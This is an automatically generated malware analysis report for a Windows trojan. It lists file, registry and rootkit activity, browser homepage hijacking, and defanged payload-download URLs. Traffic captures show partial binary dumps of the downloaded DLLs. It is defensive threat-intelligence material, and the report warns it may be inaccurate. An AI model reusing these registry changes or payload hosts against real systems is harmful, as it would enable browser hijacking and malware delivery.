Gen.Variant.Symmi.63061_17b44c721d

by malwarelabrobot on September 23rd, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Symmi.63061 (B) (Emsisoft), Gen:Variant.Symmi.63061 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 17b44c721d60a9ef91291889a7b9f566
SHA1: 8648ffc188f2851d50bea74ef64a7f423a3e91a0
SHA256: 51c7de66879e1a2c07b6f896454122f397655749348f0504252cea494551889c
SSDeep: 24576:yTr8ufset qv6FsTuLRC9LVUamQJ8Sxvzl5qjJ S6b:yqa qSFs6LQ9LVUAzJJ5q9 S
Size: 1015296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: iWin inc.
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2044

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\JoYJKb\obTCfBhEA.dll (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jscript_jquery-1.4.2.min[1].js (2740 bytes)
%WinDir%\JoYJKb\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\175sf[1].htm (4364 bytes)
%WinDir%\CLOG.txt (5129 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%WinDir%\JoYJKb\NDTmWEYYA.tmp (12 bytes)
%System%\128b12\CDClient_EX.sys (125 bytes)
%WinDir%\JoYJKb\DbHnhAd.dll (12780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\style[1].css (17 bytes)
%WinDir%\KXQgMV.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%WinDir%\JoYJKb\NDTmWEYYA.tmp (0 bytes)
%System%\128b12\CDClient_EX.sys (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%WinDir%\KXQgMV.dll (0 bytes)
%WinDir%\JoYJKb\obTCfBhEA.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (0 bytes)
%WinDir%\JoYJKb\498E9.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

Registry activity

The process %original file name%.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"ImagePath" = "\DosDevices\%System%\128b12\CDClient_EX.sys"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"Devname" = "9P00FgsFjdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 77 CD 5F B0 7D 0C A7 A0 DC EC FE DF 49 A2 29"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"ErrorControl" = "1"
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"Start" = "3"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
4ceb86e184468879c0d20101cc99567d c:\WINDOWS\JoYJKb\DbHnhAd.dll
158b710a2ce07e3a34e46118f2ad39f2 c:\WINDOWS\JoYJKb\obTCfBhEA.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\%System%\128b12\iEwx6T7VPp9.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\%System%\128b12\iEwx6T7VPp9.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\%System%\128b12\iEwx6T7VPp9.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:

ZwTerminateProcess

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 294912 115200 5.54249 ecf30aad1dd9927c1e98d6f7e77d1a35
DATA 299008 888832 882176 5.54492 74016918f11815e00744ffdba5765b47
BSS 1187840 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 1191936 8192 2048 5.07498 ba0c49d945d60d2878115fe83760ce00
.tls 1200128 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 1204224 4096 512 0.146134 3b0b537a506030303210ee9871d43d59
.reloc 1208320 24576 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 1232896 20480 5120 4.85916 cb0878068ff2e22b145fc87371f68ae1
.aspack 1253376 12288 9216 4.24392 88db9c40f23ade819e62a4c6a56eda32
.adata 1265664 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/ips1388.asp
hxxp://175.haodns123.cc/
hxxp://175.haodns123.cc/css/style.css
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js 183.60.200.84
hxxp://www.ip138.com/ips1388.asp 87.245.198.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.175sf.com/css/style.css 183.60.200.84
hxxp://www.go890.com/d2/x86.dll 87.245.198.83
hxxp://www.175sf.com/ 183.60.200.84
www.haosou.com 180.153.234.170


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 14:51:16 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L...]..W...........!........
..............................................................@.......
..........................................................|...........
................................H.....................................
......UPX0....................................UPX1....................
[email protected]...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!...........c.........B..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.....8.9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 13:31:07 GMT
Server: kangle/2.9.6
Last-Modified: Thu, 22 Sep 2016 13:01:05 GMT
Content-Type: application/octet-stream
Content-Length: 855040
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
[email protected]............
..................................."..P............................@..
......................................................................
..............CODE....................PEC2^O...... ....rsrc....0......
.&.................. ....reloc.......@......................@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................b.. .........c....X...
......b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i..
...8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?
[email protected]...."..\...3KO.w.....V.....^.#b.l......<.q.C<....
...].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}..I..
.Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R....
...O.....X}lC1L=.. ..O..b.<.W.l"c.2...w.,L]........F.........W...iy
I.)......^......'...2..U_Z.t.#...O..e.'d*dr.4.X..Rn...j.q. .....L.
<<< skipped >>>


GET /ips1388.asp HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 18:37:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9659
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQRSQRR=PJCKFDFGOMBEKMFFCFGLKOCN; path=/
Cache-Control: private
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<HTML>..<HEAD>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta http-equiv="mobile-agent" c
ontent="format=html5; url=hXXp://m.ip138.com/ip.html"/>..<TITLE&
gt;IP........--.................. | ............ | ............ | ....
....................</TITLE>..<META NAME="Generator" CONTENT=
"ip,IP....,IP........,ip138,........">..<META NAME="Author" CONT
ENT="ip138,........">..<META NAME="Keywords" CONTENT="ip,IP....,
IP........,ip138,........">..<META NAME="Description" CONTENT="i
p,IP....,IP........,ip138,........">..<SCRIPT LANGUAGE="JavaScri
pt">..<!--..function checkIP()..{...var ipArray,ip,j;...ip = doc
ument.ipform.ip.value;...if (ip.indexOf(" ")>=0){....ip = ip.replac
e(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase
().indexOf("hXXp://")==0){....ip = ip.slice(7);....document.ipform.ip.
value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip 
= ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip
.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.
ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((
ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)
|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(b
id)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|
(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(
<<< skipped >>>


GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Sep 2016 18:37:11 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...&
gt;..._,..L.,.{....$r...2"...................o.-....E.\7...".........i
.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......
h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....
)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1.......
...<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7
kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(....
..,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E
"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN...
"<....OOq...U..XY.v.."..f.K..k...........B}.<?............`.....
.`.9..Ho.....W.5&.w..A [email protected].\..].\..#.,
.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ..
....4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.m
v...f5v...p.`....i..T......~..`0k..t...........5......S...`...........
.....t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h..
..q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....
).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U..
[email protected]\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....
7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3
.4R. .c.&..]...o....T..... ..".8....p :[email protected]..:==Y...M.
...Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od
)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Sep 2016 18:37:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Thu, 22 Sep 2016 13:40:00 GMT
Content-Encoding: gzip
3d3f.............}.s.Y...vD...vj...#.....DWu.lEO..Tw........H.d....>
;...>...F.....o%.T H....W!!@ .\...l..........IJ.&.9..zhw..-...|.s.w
;.9.g...O.....R............SA.....$.........?.....o..P$....h.[.&......
..!..Y,..wv....G$B.Po......{.pq..)K..B.E.q..?9]nqt.`4..q.B.T...?..4...
.....Oi.../[email protected].!..t.},z.A{6..=.l.
..{..Y.n...E../BF.....N......=9..M..2;.D.............DF...L...c#.!....
A....~...Y=...n.y...9.i.._.L..t....2..........'.._.......$.....Eb./S.D
b..[.Jk.d..$@5....._.....[.......=uA;[email protected]?..o...r.Ao.....=g::
.fs..2f...W...%..x.....3....:..R..o?.....'0...;.....=u....vh..!.....z.
...e..}..*..gOw....7a.J..`....~..??.3lTC..8..~...@..':.}...'.fN...O...
....vV.M..6i...?;u.ui.t...../......).........@.......}NtP.A}T.[1.-....
9x.....zx...pd.b..a#E\......H>.{.5.K4js..._R.AS...m...1l.9....Q...F
[email protected]].jPO....T....P..R%. D...HD.><).H.._..T....
!.....'.F.I.....Q#u.d......5....D.W..<I_l./.......z...vD....'NvJd".
S...c3.I?.....'.v.s./.]-..ZU.....5...9.Q............>.......<.mP
.. ..h.1..............^...j.T...... |U.*.../M62...G6....D.g.......zm.W
]f.T=jg.Y..R....b.W_.^....tJ......W.w..lp;....x[1.m...t.....6.....9...
...ti)..p...Y.j..............(..:.9j..Y .J..........;.?.Y.Um..z.>..
.w.....q....c..s0...*...x.CMM..!....N..........2.T...`-.!..H....3.....
.....E.m..F....L.A.=..nJ......^....yP...{....4....-....h..D(;.5wnd....
........Eee.U.G..d.Z....;){.~...5.Y..v...D$.u.m.>.|....LT.Y...w...K
Z.....|.Q...5....V9t...}...n.....:m?!Q.W...d.. .y.h.....g.3I;=.PE.
<<< skipped >>>

GET /css/style.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Sep 2016 18:37:10 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 23 Jun 2016 10:01:38 GMT
Content-Encoding: gzip
b2a...............n......?..,.....(KZ.....Q.2.J...A...5%...^;.c..T....
[email protected]./....sf..(.:....`9.s.s...~.G....7...f.g.x52.g..,]..M|....^. .
..]...x^..F.<...o.?Z.... {f.2NnG...}......'.....#.,:.../G.'&...;9.z
.9:>._.LN..#c..".:^...-H.0.:y..l..$.W..,./r.\..y.TL&.L.G..-..QF.O.$
.(..$.h.f~...8.W..$f....|".8).5.....t...q~..}...Vg..uR:62.....4.w%._B.
..T...k?....}.....K.M.../.9....o............[........m..jI...a.(..8...
n,.To...|F.....(.....I.. ....q&._L..l".'..j. .L-"..2k..sW8@:i.#..W.,-T
...:K>.v?'_...}.K.y.}....b..>..Ig`.o........q5........r.w.......
.1;@f}...].0....95...V..`..Q...3.......yH.'.c.NNN.%.t..U....{tK.h:"..1
.,..c"`o.EA...r.x..z..1...=U....i%:.p.3..3.1.9..n_.......w.?.n....V...
 4....FZ....*Q......r...].g.$.2QZm......g..0.2..k ..s nn.$...S..[..f. 
...fi^.T...B..(.$T.3\^ R..wq.....llE}..P..e.W...%._..D...cc.$...R... .
.fd,.0.V.......#..w.&.z.`..G] . C.....{.`...G..9....p...r.x.h..N(....:
..f.\[email protected]..).D..F`#.........f.p....2L.Z.......J.......M.`[...2ZE7.e.
d.v..r.. .... .....djV..rZ...=.......d........o?....~...Q..h.......C".
=v.o.K...0.~.C(.L...B.......>Z..y'......Q..I.....=Y.J....(^....Uu'.
..02....\S!..C...Z.... S.~.=\....z.....A.n......S..H.u).L.k.P...<Hb
.Y....|u..N..8.....0.\'n......oC`...(....H.l..s....q.[7.`...1t....4...
..X.us..~.1...Z.....e...-^t.;.d....3...}F.6......., SPu.V.....e......@
...8.r..es.z...*m....5.*.2...h........R.%.^.Zc....4;.=.\.AS..OE..J.;.}
.,..YE$.;k.........@]G.i..Ptq...;M...#V.AS.......>;.....-b;....YDH.
W.#".@/.w.A......8.a..zH....,(.. `{..E.9...(."...v..F.xW...r...^..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2044:

.idata
.rdata
P.reloc
P.rsrc
.aspack
.adata
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
Uh.bB
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
